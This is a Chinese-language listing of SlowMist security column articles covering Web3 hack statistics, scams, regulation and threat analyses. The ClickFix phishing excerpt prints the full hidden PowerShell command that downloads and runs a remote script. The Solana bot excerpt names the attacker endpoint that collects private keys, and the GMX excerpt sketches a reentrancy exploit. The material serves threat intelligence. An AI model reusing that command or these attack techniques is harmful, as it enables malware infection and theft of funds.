慢雾科技

慢雾科技

Bitpush 专栏 · 共71篇文章

每月动态 | Web3 安全事件总损失约 8289 万美元

来源:慢雾科技概览2025 年 8 月,Web3 安全事件总损失约 8289 万美元。其中,据慢雾区块链被黑档案库(https://hacked.slowmist.io) 统计,共发生 9 起被黑事件,导致损失约 7073 万美元,有 630 万美元得到冻结或返还,事件原因涉及合约漏洞、跑路和账号被黑等。此外,据 Web3 反诈骗平台 Scam Sniffer 统计,本月有 15,230 名钓鱼事件受害者,损失规模达 1216 万美元。(https://dune.com/scam-sniffer/august-2025-scam-sniffer-scam-report)安全大事件BtcTurk2025 年 8 月 14 日,土耳其加密货币交易所 BtcTurk 疑似再遭攻击,损失约 5400 万美元。此前,在 2024 年 6 月 22 日,BtcTurk 遭遇攻击,损失约 9000 万美元。对于本次事件,BtcTurk 承认其热钱包出现“异常活动”,并已暂停充值和提现。但其并未披露更多有关攻击规模的细节。(https://x.com/BtcTurkKripto/status/1955981988747198513)ODIN.FUN2025 年 8 月 12 日,基于比特币的迷因币发行平台 ODIN.FUN 遭攻击,损失约 58.2 BTC(约 700 万美元)。攻击者疑似通过操纵多个代币的价格,再基于虚高的价格提取比特币。8 月 17 日,ODIN.FUN 联合创始人 Bob Bodily 表示:“今天在资金方面取得了重大进展(很多人已经看到了)。已有 30 多枚 BTC 回流 ODIN,更多资金也在处理中。”(https://x.com/BobBodily/status/1956939734691008849)BetterBank2025 年 8 月 27 日,基于 PulseChain 的 DeFi 项目 BetterBank 遭攻击,损失约 500 万美元。攻击者利用合约漏洞铸造任意代币,其中部分代币被兑换成 ETH。攻击者随后归还了约 5.5 亿 pDAI(约 270 万美元)的被盗资产。(https://x.com/BetterBank_io/status/1960661185226744109)Credix2025 年 8 月 4 日,去中心化借贷协议 Credix 遭攻击,损失约 450 万美元。攻击者通过控制管理员钱包,伪造代币并抽走流动性池中的资金。事后,Credix 宣称已与攻击者达成和解,对方同意归还资金,条件是“由 Credix 金库全额支付一定金额”。不过,Credix 并未披露实际支付了多少。在这一声明发布后不久,Credix 的社交媒体账号被删除,团队也随之消失。这引发外界怀疑,此次所谓的攻击实际上可能是内部人员策划的跑路。至今,承诺的赔偿仍未兑现。特征分析及安全建议从 8 月的事件中可以看到,中心化平台的热钱包依旧是高风险点,一旦被攻破就可能导致大额资金流失;合约漏洞依然频繁出现,价格操纵和代币铸造相关的问题被多次利用,说明部分协议在上线后缺乏持续的安全维护。此外,本月还出现团队在事件后消失的情况,引发外界对所谓“攻击”是否实为跑路的质疑,这类风险对投资者的打击往往更大。整体来看,资金追回的难度依旧很高,个别案例虽有部分资产追回,但比例有限,足以说明事前防护比事后追讨更为重要。因此,无论是平台还是用户,都需要持续提升安全意识与防护手段。慢雾安全团队建议项...

353天前慢雾科技慢雾科技
每月动态 | Web3 安全事件总损失约 8289 万美元

威胁情报:Clickfix 钓鱼攻击

来源:慢雾科技作者:Joker&Thinking编辑:KrsMt.&Liz背景近日,MistEye 安全监控系统发现一个钓鱼网站,该网站采用 Clickfix 钓鱼攻击技术。这类钓鱼网站主要通过模仿正规网站常用的机器人校验功能,诱导受害者执行恶意命令,达到下载恶意软件的目的。获取到相关恶意样本信息后,慢雾安全团队立即展开分析。分析过程访问该钓鱼网站时,会显示正规网站常用的机器人校验功能。当受害者点击了 checkbox 开始校验后,该钓鱼网站会将恶意命令自动复制到剪贴板中,并且引导受害者按下特定的按键,实现恶意软件的下载与执行。在这段前端代码中,程序会监听来自 iframe 或父/子窗口的 postMessage 消息。当接收到“turnstileSuccess”消息时,就会调用 copyTextSilently () 方法。在 index_1.html 页面的前端代码中,做了 checkbox 监听,当受害者正常触发该 checkbox 后,会向父页面发送“turnstileSuccess”消息。复制恶意命令到剪贴板在 copyTextSilently() 方法中,首先会去判断是否满足调用 Clipboard API 条件。如果条件满足,直接调用 Clipboard#writeText() 方法,写入命令到剪贴板中。如果条件不满足,则先创建一个 <textarea> 元素,把要复制的命令放到 <textarea> 里,然后隐藏元素并添加到页面后,使用 execCommand() 方法复制命令,最后移除元素。在前端代码中可以看到,command_win 命令是从全局作用域的 window 对象中获取的。根据注释可以知道,window.command_win 可能是在外部脚本 assets/command.js 中定义的。查看 command.js 文件可知,该文件中确实定义了全局变量 window.command_win,而该命令的主要功能是从远程服务器下载恶意脚本,并通过 PowerShell 在本地隐藏执行。powershell -w h -c "$u='http[:]//electri[.]billregulator[.]com/aTu[.]lim';$p='$env:USERPROFILE\Music\d.ps1';(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"从前端代码中可以看到,点击 VERIFY 按钮同样会触发 copyTextSilently () 方法,但受浏览器安全限制,受害者在点击 VERIFY 按钮后,还需再次点击网页页面,才能完成恶意命令的复制操作。分析恶意脚本$mmASoSdDL 是一个数组,先通过 join 方法拼接为字符串,再对这段 Base64 编码的字符串进行解码,将得到的字节数组转换为 UTF-8 字符串,最后把该 JSON 字符串转换为 PowerShell 对象。 解码后的部分内容如下:创建隐藏目录该恶意脚本会先判断目标目录是否存在,若不存在则创建该目录,并将其属性设置为“Hidden”和“System...

362天前慢雾科技慢雾科技
威胁情报:Clickfix 钓鱼攻击

每月动态 | Web3 安全事件总损失约 1.47 亿美元

概览2025 年 7 月,Web3 安全事件总损失约 1.47 亿美元。其中,据慢雾区块链被黑档案库(https://hacked.slowmist.io) 统计,共发生 13 起被黑事件,导致损失约 1.4 亿美元,有 4248 万美元得到冻结或返还,事件原因涉及合约漏洞、供应链攻击和账号被黑等。此外,据 Web3 反诈骗平台 Scam Sniffer 统计,本月有 9143 名钓鱼事件受害者,损失规模达 709 万美元。(https://dune.com/scam-sniffer/july-2025-scam-sniffer-scam-report)安全大事件CoinDCX2025 年 7 月 19 日,链上侦探 ZachXBT 于其个人频道发文称:“看起来印度的中心化交易平台 CoinDCX 可能在大约 17 小时前被盗,损失约 4420 万美元,但截至目前仍未向社区披露此事件。”不久后,该公司联创 Sumit Gupta 在 X 上作出回应。在回应中,Sumit 披露受到攻击的钱包是一个仅用于提供流动性的内部运营账户,客户的资金因储存在安全的冷钱包中而并未受到影响,交易和提款将恢复正常,攻击产生的全部损失将由 CoinDCX 的储备金承担。(https://x.com/smtgpt/status/1946597988660645900)7 月 31 日,据 FinanceFeeds 报道,CoinDCX 的一位软件工程师因涉及协助攻击被捕。攻击者以兼职工作为由向该软件工程师的电脑中安装恶意软件,并支付高额兼职薪资。该恶意软件是一款复杂的键盘记录器,攻击者借此获取登录凭证并访问 CoinDCX 的内部系统,最终导致了此次事件。GMX2025 年 7 月 9 日,据慢雾 MistEye 安全监控系统监测,去中心化交易平台 GMX 遭攻击,损失价值超 4200 万美元的资产。据慢雾安全团队分析,本次攻击的核心在于攻击者利用了 Keeper 系统执行订单时会启用杠杆,以及做空时会更新全局平均价格而平空却不会更新的这两个特性,通过重入攻击创建大额空头头寸,操控了全局空头平均价格和全局空头仓位规模的值,从而直接放大了 GLP 价格来赎回获利,详细分析见GMX 被黑分析:4200 万美金瞬间蒸发。(https://x.com/SlowMist_Team/status/1942949653231841352)7 月 11 日,GMX 在 X 上发布声明,表示此次安全事件源于 GMX V1 代码库的安全漏洞,该漏洞已披露,并通知 GMX V1 分支。为感谢该白帽黑客所作出的努力,GMX 已向其支付 500 万美元赏金,此前攻击涉及的 4200 万美元资金已得到保障。(https://x.com/GMX_IO/status/1943654914749534380)BigONE2025 年 7 月&n...

382天前慢雾科技慢雾科技
每月动态 | Web3 安全事件总损失约 1.47 亿美元

香港稳定币发行人 AML/CFT 监管“三部曲”:政策演进、制度落地与技术合规

背景2025 年 7 月 29 日,香港金融管理局(HKMA) 就 2025 年 8 月 1 日起正式实施的稳定币发行人监管制度发布多个指引及说明文件,其中两套指引于 2025 年 8 月 1 日刊宪。《持牌稳定币发行人监管指引》咨询总结及该指引;《打击洗钱及恐怖分子资金筹集指引(持牌稳定币发行人适用)》咨询总结及该指引; 与发牌制度及申请程序相关的《稳定币发行人发牌制度摘要说明》;《原有稳定币发行人过渡条文摘要说明》这些文件构成香港稳定币制度落地的核心监管组件:不仅包括与发牌申请与监管过渡相关的摘要说明,还包括两份围绕反洗钱与反恐怖融资(AML / CFT) 框架制定的核心规范,其内容直接关乎稳定币发行人能否建立合规、可控、可持续的业务框架,并体现金管局对洗钱与恐怖融资风险的系统性回应,也是本文的解读重点。7 月发布的咨询总结与指引咨询总结:确立制度优化方向在 2025 年 5 月 26 日至 6 月 30 日的公众咨询期间,金管局共收到来自银行、虚拟资产平台、Web3 公司、技术服务商及律所等 38 份反馈意见。总结文件主要围绕以下几个关键议题回应业界关注,并相应修订原拟议要求:非托管钱包监管强度调整:市场普遍认同需管理客户钱包相关的风险,但有意见指出,由于当前技术和分析工具的限制,难以有效区分链上的非托管钱包和托管钱包。金管局要求持牌人核实每个客户钱包的拥有权或控制权,而无需进行钱包类型的分类。链上监控技术灵活应用:多数意见支持利用区块链数据追踪交易,但担心强制性技术规范将阻碍中小企业。金管局最终采纳“技术适配”原则,鼓励使用而非强制特定工具,要求合规能力与业务体量相符。Travel Rule 角色识别:意见指出持牌人需明确在交易中是“发起方”“中介方”或“接收方”,以便履行不同义务。金管局表示将继续与业界持份者紧密合作,并在适当情況下提供进一步指引。次级市场责任合理限定:关于稳定币发行人是否应承担次级市场监控责任,一些意见认为发行人应发挥作用,因为他们对稳定币生命周期有最全面的理解和最终控制。另一些意见则认为,发行人对次级市场交易的可见性和控制力有限,且技术上难以监控每一笔点对点(peer-to-peer) 交易,特别是涉及非托管钱包的交易。金管局的回应重申了稳定币发行人有必要建立并实施充分和适当的控制系统,以防止和打击其持牌稳定币活动中的洗钱/恐怖融资及其他犯罪行为;考虑到稳定币某些特征对犯罪分子具有吸引力,以及点对点交易和非托管钱包相关的风险,金管局在实施初期将采取谨慎态度;除非持牌人能够向金管局证明并使其信纳其风险缓减措施能有效防止和打击洗钱/恐怖融资及其他罪行,否则,每一名稳定币持有人的身份(包括与持牌人没有客户关系的持有人)应由以下其中一方核实:(i) 持牌人;(ii) 受适当监管的金融机构或虚拟资产服务提供者;或 (iii) 可靠的第三方。综上,《咨询总结》体现出金管局在坚持监管原则的基础上,更加重视可执行性与监管弹性,并针对技术发展不均、市场多元性等现实问题作出制度性回应。指引:制度条文化与执行细化《指引》由《稳定币条例》(第 656 章)第 171 条以及《打击洗钱及恐怖分子资金筹集条例》(AMLO,第 615 章)第7条授权制定,既传承了 5 月《咨询文件》的政策框架,也根据 7 月《咨询总结》中对非托管钱包、技术可行性、责任范围的反馈,进行了实质性细化和法律转化。与前期《咨询文件》与《咨询总结》侧重于政策设计与公众反馈不同,《指引》构成香港稳定币 AML / CFT 监管架构中具有强制执行力的合规操...

386天前慢雾科技慢雾科技
香港稳定币发行人 AML/CFT 监管“三部曲”:政策演进、制度落地与技术合规

威胁情报:Solana 开源机器人盗币分析

来源:慢雾科技原文链接:https://mp.weixin.qq.com/s/Tu5queqqz874swt6znwbtA背景在 2025 年 7 月初,慢雾安全团队接到一名受害用户的求助,请求协助分析其加密资产被盗的原因。调查发现,事件源于该用户使用了一个托管在 GitHub 上的开源项目 zldp2002/solana-pumpfun-bot,进而触发了隐蔽的盗币行为,详情见GitHub 热门 Solana 工具暗藏盗币陷阱。近期,又有用户因使用类似的开源项目 —— audiofilter/pumpfun-pumpswap-sniper-copy-trading-bot,导致加密资产被盗,并联系到慢雾安全团队。对此,团队进一步深入分析了该攻击手法。分析过程静态分析我们首先通过静态分析的方式,寻找攻击者设置的陷阱。经分析,发现可疑代码位于 /src/common/config.rs 配置文件中,主要集中在 create_coingecko_proxy() 方法内:从代码可见,create_coingecko_proxy() 方法首先调用了 import_wallet(),该方法进一步调用 import_env_var() 来获取私钥。在 import_env_var() 方法中,主要用于获取 .env 文件中的环境变量配置信息。调用过程中,如果环境变量存在,则直接返回;若不存在,则进入 Err(e) 分支,打印错误信息。由于存在无退出条件的 loop {} 循环,会导致资源持续消耗。PRIVATE_KEY(私钥)等敏感信息也存储在 .env 文件中。回到 import_wallet() 方法,当其中调用 import_env_var() 获取到 PRIVATE_KEY(私钥)后,恶意代码会对私钥长度进行判断:若私钥长度小于 85,恶意程序将打印错误信息,并由于存在无退出条件的 loop {} 循环,会导致资源持续消耗,恶意程序无法正常退出;若私钥长度大于 85,则使用 Solana SDK 将该 Base58 字符串转换为 Keypair 对象,其中包含私钥信息。随后,恶意代码使用 Arc 对私钥信息进行封装,以支持多线程共享。回到 create_coingecko_proxy() 方法,在成功获取私钥信息后,恶意代码接着对恶意 URL 地址进行解码。该方法首先获取编码后的 HELIUS_PROXY(攻击者服务器地址)这一硬编码常量。随后,恶意代码使用 bs58 对 HELIUS_PROXY(攻击者服务器地址)进行解码,将解码结果转换为字节数组,并通过 from_utf8() 将该字节数组进一步转为 UTF-8 字符串。通过编写脚本可还原出 HELIUS_PROXY 解码后的真实地址如下:http://103.35.189.28:5000/api/wallets恶意代码在成功解码出 URL (http://103.35.189.28:5000/api/wallets) 后,首先创建一个 HTTP 客户端,将获取到的私钥信息 payer 使用 to_base58_string() 转换为 Base58 字符串。随后,恶意代码构造 JSON 请求体,并将转换后的私钥信息封装其中,通过构建 POST 请求,将私钥等数据发送至上述 URL 所指向的服务器,同时忽略响应结果。无论服务器返回何种结果,恶意代码仍会继续运行,以避免引起用户察觉。此外,create_coingecko_proxy() ...

396天前慢雾科技慢雾科技
威胁情报:Solana 开源机器人盗币分析

慢雾:面向香港稳定币发行人的智能合约实施指南

来源:慢雾科技原文链接:https://mp.weixin.qq.com/s/3KGxo7PVvNHfcMcc8KCfcw随着《稳定币条例》的正式通过,香港金融管理局(HKMA) 于 2025 年 5 月 26 日发布了《持牌稳定币发行人监管指引(草案)》,旨在确保本地稳定币生态的稳定、安全与合规运作。该指引详尽列明了持牌稳定币发行人必须持续遵守的监管要求与运营标准。近期,越来越多机构就智能合约的合规实施问题向慢雾安全团队(SlowMist) 咨询。为协助发行人更好地理解和部署合规的智能合约体系,我们特别发布了《面向香港稳定币发行人的智能合约实施指南》,以提供清晰的技术路径与实践建议,支持香港稳定币生态的健康发展。第一部分 基础架构与合规策略本部分旨在为稳定币系统奠定高层架构的基石,这些架构决策完全由香港金融管理局(HKMA) 框架中最根本的要求驱动。在此处做出的选择将决定整个实施路径,确保从设计之初就将合规性深度嵌入技术栈中。1. 底层分布式账本的选择监管指令持牌人必须评估其所使用的底层分布式账本技术(DLT) 的稳健性。此评估涵盖安全基础设施、对常见攻击(如 51% 攻击)的抵御能力、交易最终性保障以及共识算法的可靠性1。慢雾(SlowMist) 技术解读这并非一项简单的技术偏好选择,而是一项核心的合规任务。对底层区块链的选择必须经过正式的尽职调查,整个评估过程也需被详细记录,以便在监管审查时提供充分理据。底层账本的选择过程实际上为整个稳定币系统的安全性与稳定性奠定了基调。香港金管局对账本稳健性的强调,实质上是在劝诫发行方避免采用未经市场验证、中心化程度过高或安全性存疑的新兴区块链。证明其安全性与稳定性的责任完全由发行方承担。如果发行方选择了安全性尚未被广泛验证的链,就必须设计并实施额外的补偿性控制措施。实施指南优先选择成熟的公有链:建议优先选用如 Ethereum、Arbitrum 等成熟且具备高安全性的公有区块链。这类网络凭借其久经考验的韧性、庞大的验证节点网络以及持续的公众监督,具备天然优势。其高昂的攻击成本(经济安全性)可直接回应监管对抵御 51% 攻击及保障交易最终性的关切。替代方案的严格评估:若考虑采用联盟链或其他类型的分布式账本,必须开展一项严谨且可量化的对比分析,例如慢雾安全审计,以证明其安全标准不低于,甚至优于主流的公有链。风险评估文档:评估报告必须全面覆盖其抵御常见攻击的能力、共识算法类型,以及与代码缺陷、漏洞、漏洞利用及其他威胁相关的风险2,并详细分析这些风险如何对稳定币的发行、赎回及日常运营构成潜在影响。此文档是向监管机构证明技术选型审慎性的关键文件。2. 核心代币标准与监管功能扩展监管指令监管文件并未指定某一特定的代币标准(如 ERC-20)。然而,文件强制要求实现一系列核心管理功能,包括铸币(mint)、销毁(burn)、升级(upgrade)、暂停(pause)、恢复(resume)、冻结(freeze)、黑名单(blacklist)、白名单(whitelist) 等操作3。慢雾(SlowMist) 技术解读香港金管局事实上定义了一个功能远超 ERC-20 标准的“监管增强型”代币标准。该标准不仅要求具备基础的代币流转功能,更强调操作安全性、权限可控性和风险可追溯性。为了在满足合规要求的同时最大限度地保障安全性,最高效且最稳妥的开发路径,是采用经过广泛审计、社区公认的标准库(如 OpenZeppelin),并在此基础上进行功能扩展。实施指南基础标准:采用 ERC-20 作为基础标准,以确保代币的同质化和在更广泛生...

396天前慢雾科技慢雾科技
慢雾:面向香港稳定币发行人的智能合约实施指南

130 亿资金去向成谜:鑫慷嘉 DGCX 骗局崩盘始末

来源:慢雾科技原文链接:https://mp.weixin.qq.com/s/L3vInWtBNZD5IZn4Z5Loaw据报道,2025 年 6 月 26 日,名为鑫慷嘉 DGCX 的线上投资平台突然关闭所有提现通道,大量用户发现其账户内资产被冻结或清零,资金无法取出。该事件迅速在社交媒体平台上发酵,引发广泛关注。尽管目前尚无权威机构发布受害者人数和资金损失的准确数据,但据投资者相传,此次事件可能涉及资金规模达 130 亿元人民币,受害人数或超过 200 万人。据部分公开信息披露,早在 2019 年,鑫慷嘉曾向某企业出售过价值 20 万元的油品过滤设备,此后该交易被对外包装成“与中石油签署五年战略合作协议”;2021 年 3 月,该项目以贵州鑫慷嘉大数据有限公司的名义开始运作,尽管该公司宣称有 3000 万的注册资金,实际缴纳金额却为零,且早已被列入经营异常名单,符合“空壳公司”特征。2023 年 5 月,该平台推出 DGCX 鑫慷嘉大数据交易所,声称其为“迪拜黄金与商品交易所(DGCX) 在中国的官方分站”,并自称与中石油、中远海运等多家国企达成合作。平台通过发布伪造的合同、公函、官网截图等材料进行背书,以强化其“正规军”形象。事实上,该平台与 DGCX 并无任何隶属或业务关联,整套资质系统是披着“国际金融”的伪装外衣。真正的 DGCX 曾多次公开发文,否认与其存在授权或合作,并警告用户防范假冒平台。网传创办人黄鑫在潜逃海外后还在会员微信群组留下一段话,该内容虽无法独立核实其真伪,但在社群中被广泛传播,也进一步加剧了投资者的愤怒情绪。MistTrack 链上分析针对鑫慷嘉 DGCX 项目的链上资金流转情况,我们使用慢雾(SlowMist) 旗下反洗钱追踪分析系统 MistTrack(https://misttrack.io/) 对该案件相关链上地址进行深入溯源。链上行为显示该项目可能构建了一套复杂的多层级资金结构,资金从集中入口流入,再经多次中转后流出,初步具备庞氏骗局常见的链上运行特征。目前我们已分析识别出约 80 万个用户充值地址,涉及的资金规模高达 15 亿美元。需要强调的是,此小节的数据基于公开链上信息进行技术分析和挖掘,不能代表项目全部资金路径和最终事实,统计结果可能存在误差,仅供参考。部分推论基于当前链上行为表现,并未构成法律意义上的事实认定,仍需进一步数据支持与多方验证。1. 用户资金流入分析发现,资金源头几乎都来自中心化交易所的热钱包,且这些资金随后被以整数额(如 1000、2000 USDT 等)分发至众多地址。考虑到该项目要求用户以 USDT 入会,用户需先将人民币兑换成 USDT 再充值至指定地址,因此推测这可能是项目方向用户收取人民币后,再从交易所统一提币并分发 USDT 的操作。这些整数额度与该项目据称的“入会费”模式相吻合,也存在充值入金行为的可能。平台疑似采用了一种集中控币、分配充值地址的管理方式,即由平台给用户提供用于参与项目的地址,用户并不直接掌握私钥。 2. 平台内部资金聚合多个“用户地址”接收到 USDT 后,再将资金经过 1~2 层转入由平台控制的汇集地址。汇集地址显示出以下特征:收入交易笔数显著高于支出交易笔数;汇集来自多个“用户地址”的资金;后续再向新的“下一跳”地址转账。 以上行为表明这批地址可能作为“中继层”或“聚合节点”存在,承担将用户“充值资金”/“入会费”统一归集的作用。3. 提现与手续费汇集地址会将资金分散转移到&nb...

404天前慢雾科技慢雾科技
130 亿资金去向成谜:鑫慷嘉 DGCX 骗局崩盘始末

GMX 被黑分析:4200 万美金瞬间蒸发

作者:九九&Kong&Lisa编辑:Liz背景2025 年 7 月 9 日,据慢雾 MistEye 安全监控系统监测,知名去中心化交易平台 GMX (@GMX_IO) 遭攻击,损失价值超 4200 万美元的资产。慢雾安全团队第一时间对该事件展开分析,并将结果整理如下:(https://x.com/SlowMist_Team/status/1942949653231841352)相关信息攻击者地址:https://arbiscan.io/address/0xdf3340a436c27655ba62f8281565c9925c3a5221攻击合约地址:https://arbiscan.io/address/0x7d3bd50336f64b7a473c51f54e7f0bd6771cc355存在漏洞的合约地址:https://arbiscan.io/address/0x3963ffc9dff443c2a94f21b129d429891e32ec18攻击交易:https://arbiscan.io/tx/0x03182d3f0956a91c4e4c8f225bbc7975f9434fab042228c7acdc5ec9a32626ef根本原因此次攻击的根本原因主要有两点:一是 GMX v1 在创建空头头寸时会更新全局空头平均价格(globalShortAveragePrices) 的值,而关掉空头头寸时却不会对其进行任何更新。二是 GMX v1 在处理空头头寸时会立即增加全局空头仓位规模(globalShortSizes)。这两个因素直接影响了总资产规模(AUM) 的计算,进而导致 GLP 代币价格被操控。攻击者利用这个设计缺陷,通过 Keeper 在执行订单时会启用 `timelock.enableLeverage` 的特性(创建大额空单的必要条件),以重入的方式成功创建大额空头头寸,操纵全局平均价格和全局空头头寸规模,在单笔交易中人为抬高 GLP 的价格,并通过赎回操作获利。攻击前置准备1. 攻击者首先用两笔前置交易为攻击合约先创建一个做多的仓位,之后再创建一个能让 Keeper 执行的减仓订单。2. Keeper 收到减仓订单后会调用 PositionManager 合约的executeDecreaseOrder 函数为攻击合约执行减仓操作。其中会先调用 Timelock 合约的 enableLeverage 函数去启用 Vault 合约中的 _isLeverageEnabled 为 true,这是后续攻击流程中能直接创建空头仓位的必要条件。 之后会调用 OrderBook 合约的 executeDecreaseOrder 函数执行减仓的具体逻辑,在对攻击合约的仓位进行更新之后,会将减仓得到的抵押品代币转移给攻击合约。而因为抵押品代币是 WETH,所以会将 WETH 换回 ETH 后再转给攻击合约,这就触发了攻击合约中构造的 fallback 函数来进行后续的重入操作。3. 攻击合约的 fallback 函数会先将 3001 枚 USDC 转移给 Vault 合约,并调用 Vault 合约的 increasePosition 函数开 30 倍的 WBTC 空单。之后再对该仓位创建对应的平仓订单,以供 Keeper 后续能继续调用。在increasePosition 函数中,会先调用其内部的 _v...

407天前慢雾科技慢雾科技
GMX 被黑分析:4200 万美金瞬间蒸发

黑客、暗网、毒品市场背后的俄罗斯服务商 Aeza Group 遭制裁

作者:Lisa&Liz编辑:Liz背景近期,美国财政部外国资产控制办公室(OFAC) 宣布制裁总部位于俄罗斯的 Aeza Group 及其关联实体,理由是该公司为勒索软件和信息窃取工具提供托管服务。 (https://home.treasury.gov/news/press-releases/sb0185)此次制裁涵盖 Aeza Group 及其英国前台公司 Aeza International Ltd.、两家俄罗斯子公司(Aeza Logistic LLC 和 Cloud Solutions LLC)、四名高管(CEO Arsenii Penzev、总监 Yurii Bozoyan、技术总监 Vladimir Gast 以及管理人 Igor Knyazev),以及一个加密钱包(TU4tDFRvcKhAZ1jdihojmBWZqvJhQCnJ4F)。“网络犯罪分子仍严重依赖 Aeza Group 这样的防弹托管服务商,来发动破坏性勒索软件攻击、窃取美国技术并销售黑市毒品,”美国财政部负责反恐与金融情报的代理副部长 Bradley T. Smith 表示,“财政部将继续与英国及其他国际伙伴密切协作,坚定不移地揭示支撑这一犯罪生态的关键节点、基础设施与相关人员。”这一制裁行动标志着国际执法机构正将打击重点从攻击者本身,延伸至其背后的技术基础设施和服务商。本文将梳理 Aeza Group 的背景与运作模式,并结合链上反洗钱与追踪工具 MistTrack 的分析以还原其在犯罪生态中的角色。Aeza Group 是谁?(https://www.pcmag.com/news/us-sanctions-russian-web-hosting-provider-aeza-for-fueling-malware)Aeza Group 是一家总部位于俄罗斯圣彼得堡的防弹托管(BPH) 服务提供商,长期为勒索软件团伙、信息窃取工具(infostealers) 运营者以非法毒品交易平台等网络犯罪团伙提供专用服务器和匿名托管服务。其客户包括:臭名昭著的信息窃取工具运营方如 Lumma 和 Meduza,这些组织曾对美国国防工业基地和全球科技公司发动攻击;勒索软件与数据窃取团伙 BianLian 和 RedLine;以及俄罗斯著名暗网毒品市场 Blacksprut。Aeza 不仅为 Blacksprut 提供托管服务,还参与其技术架构建设。根据 OFAC 披露,Blacksprut 被广泛用于芬太尼及其他合成毒品的全球分销,严重威胁公共安全。MistTrack 分析根据链上反洗钱与追踪平台 MistTrack 分析,被制裁地址(TU4tDFRvcKhAZ1jdihojmBWZqvJhQCnJ4F) 自 2023 年开始活跃,已累计接收超过 35 万美元的 USDT。 根据 MistTrack 分析,该地址与以下对象存在交互:向多个知名交易平台 / OTC 转出资产,如 Cryptomus、WhiteBIT 等,用于资金清洗;与被制裁实体关联,如 Garantex、Lumma;与在 Telegram 推广的信息盗窃即服务平台(Stealer-as-a-Service) 关联;与暗网毒品市场 Blacksprut 相关地址关联。据 MistTrack 交易对手功能分析,该地址的交互对象占比如下:  此外,我们还发现在&nb...

409天前慢雾科技慢雾科技
黑客、暗网、毒品市场背后的俄罗斯服务商 Aeza Group 遭制裁

扳手攻击:新高之下绑架案掀起暗流

来源:慢雾科技原文链接:https://mp.weixin.qq.com/s/HzKypCMrW0lAOhSg4vKo0w在区块链黑暗森林中,我们常谈论链上攻击、合约漏洞、黑客入侵,但越来越多案例提醒我们风险已蔓延至链下。据 Decrypt 与 Eesti Ekspress 报道,在近期一场庭审中,加密亿万富翁、企业家 Tim Heath 回顾了自己去年遭遇的一起绑架未遂案。攻击者通过 GPS 追踪、伪造护照与一次性手机掌握其行踪,趁其上楼之际从背后发起袭击,企图用袋子套住他头部并强行控制。Heath 咬掉对方一截手指后才得以脱身。随着加密资产价值不断攀升,针对加密用户的扳手攻击愈发频繁。本文将深入解析这类攻击手法,回顾典型案例,梳理背后的犯罪链条,并提出切实可行的防范与应对建议。(https://www.binance.com/en/blog/security/binance-physical-security-team-on-how-to-avoid-the-threat-of-reallife-attacks-634293446955246772)什么是扳手攻击“你可以有最强的技术保护,但攻击者只需要一把扳手,把你打趴下,你就会乖乖说出密码。”5 美元扳手攻击($5 Wrench Attack)这一表达最早出现在网络漫画 XKCD 中,攻击者不使用技术手段,而是通过威胁、勒索甚至绑架等方式,迫使受害者交出密码或资产。 (https://xkcd.com/538/)典型绑架案回顾今年以来,针对加密用户的绑架案件频发,受害者涵盖项目方核心成员、KOL 乃至普通用户。5 月初,法国警方成功解救了一位被绑架的加密货币富豪的父亲。绑匪索要数百万欧元赎金并残忍切断其手指,以施压家属。类似案件早在年初就已出现:1 月,Ledger 联合创始人 David Balland 及其妻子在家中遭到武装袭击,绑匪同样砍断其手指并拍摄视频,要求支付 100 枚比特币。6 月初,一名拥有法国与摩洛哥双重国籍的男子 Badiss Mohamed Amide Bajjou 在丹吉尔落网,据 Barrons 报道,其涉嫌策划多起法国加密货币企业家绑架案。法国司法部长证实,该嫌疑人因“绑架、非法拘禁人质”等罪名被国际刑警通缉。而且,Bajjou 被怀疑是 Ledger 联合创始人绑架案的主谋之一。另一起震惊业界的案件发生在纽约。意大利籍加密投资者 Michael Valentino Teofrasto Carturan 被诱骗至一处别墅,遭到长达三周的囚禁和折磨。犯罪团伙利用电锯、电击装置和毒品实施威胁,甚至将他悬挂在高楼顶层,逼迫其交出钱包私钥。行凶者是“业内人士”,通过链上分析和社交媒体跟踪,精准锁定目标。5 月中,Paymium 联合创始人 Pierre Noizat 的女儿和年幼孙子在巴黎街头险些被强行拖入一辆白色货车。据《巴黎人报》报道,Noizat 的女儿激烈反抗,一名路人用灭火器砸向货车,迫使绑匪逃离。这些案件表明:相较于链上攻击,线下暴力威胁更为直接、高效,且门槛更低。攻击者多为年轻人,年龄集中在 16 至 23 岁之间,具备基本的加密认知。据法国检方公布的数据,已有多名未成年人因涉入此类案件被正式起诉。除了公开报道的案件,慢雾安全团队在整理受害者提交的表单信息时,也注意到部分用户在线下交易时遭遇对方控制或胁迫,导致资产受损。此外,还有一些并未升级为肢体暴力的“非暴力胁迫”事件。例如攻击者通过掌握受害者的隐私、行踪或其他...

409天前慢雾科技慢雾科技
扳手攻击:新高之下绑架案掀起暗流

慢雾出品 | 2025 年上半年区块链安全与反洗钱报告

由于篇幅限制,本文仅罗列分析报告中的关键内容,完整内容可通过以下链接下载。中文:https://www.slowmist.com/report/SlowMist-first-half-of-the-2025-report(CN).pdf英文:https://www.slowmist.com/report/SlowMist-first-half-of-the-2025-report(EN).pdf一、前言2025 年上半年,区块链行业在高速发展的同时,也持续承压于日益复杂的安全威胁与合规挑战。一方面,黑客攻击持续活跃,APT 组织攻击手段趋于模块化、系统化,钓鱼与社工攻击泛滥,造成重大资产损失和用户信任危机。另一方面,全球监管加速演进,各国政府和国际组织围绕反洗钱、制裁、投资者保护等方面频繁出台新规。值得关注的是,稳定币正逐步演化为连接传统金融与链上金融的关键基础设施,全球主要金融机构与头部加密平台纷纷加快稳定币战略布局。除此之外,黑产资金流转模式不断演变,链上追踪技术与情报协作机制也持续进化,监管机构与头部平台的合作日益密切,资金冻结与追回案例显著增加,对链上犯罪与非法资金形成更强震慑。作为区块链安全领域的先行者,慢雾(SlowMist) 持续在威胁情报、攻击监测、追踪溯源和合规支持方面深耕。在此背景下,本报告聚焦 2025 年上半年的重大安全事件、全球监管演进以及链上反洗钱趋势。希望本报告能为行业从业者、安全研究人员与合规负责人提供及时、系统、具有洞察力的安全合规参考,提升对风险的识别、响应与预判能力。二、区块链安全态势安全事件回顾2025 年上半年,区块链领域依旧面临严峻的安全挑战。根据慢雾(SlowMist) 区块链被黑事件档案库(SlowMist Hacked) 的不完全统计,上半年共发生 121 起安全事件,造成损失约 23.73 亿美元。 对比 2024 年上半年(共 223 件,损失约 14.3 亿美元),虽然事件数量有所下降,但整体损失金额却同比增长了约 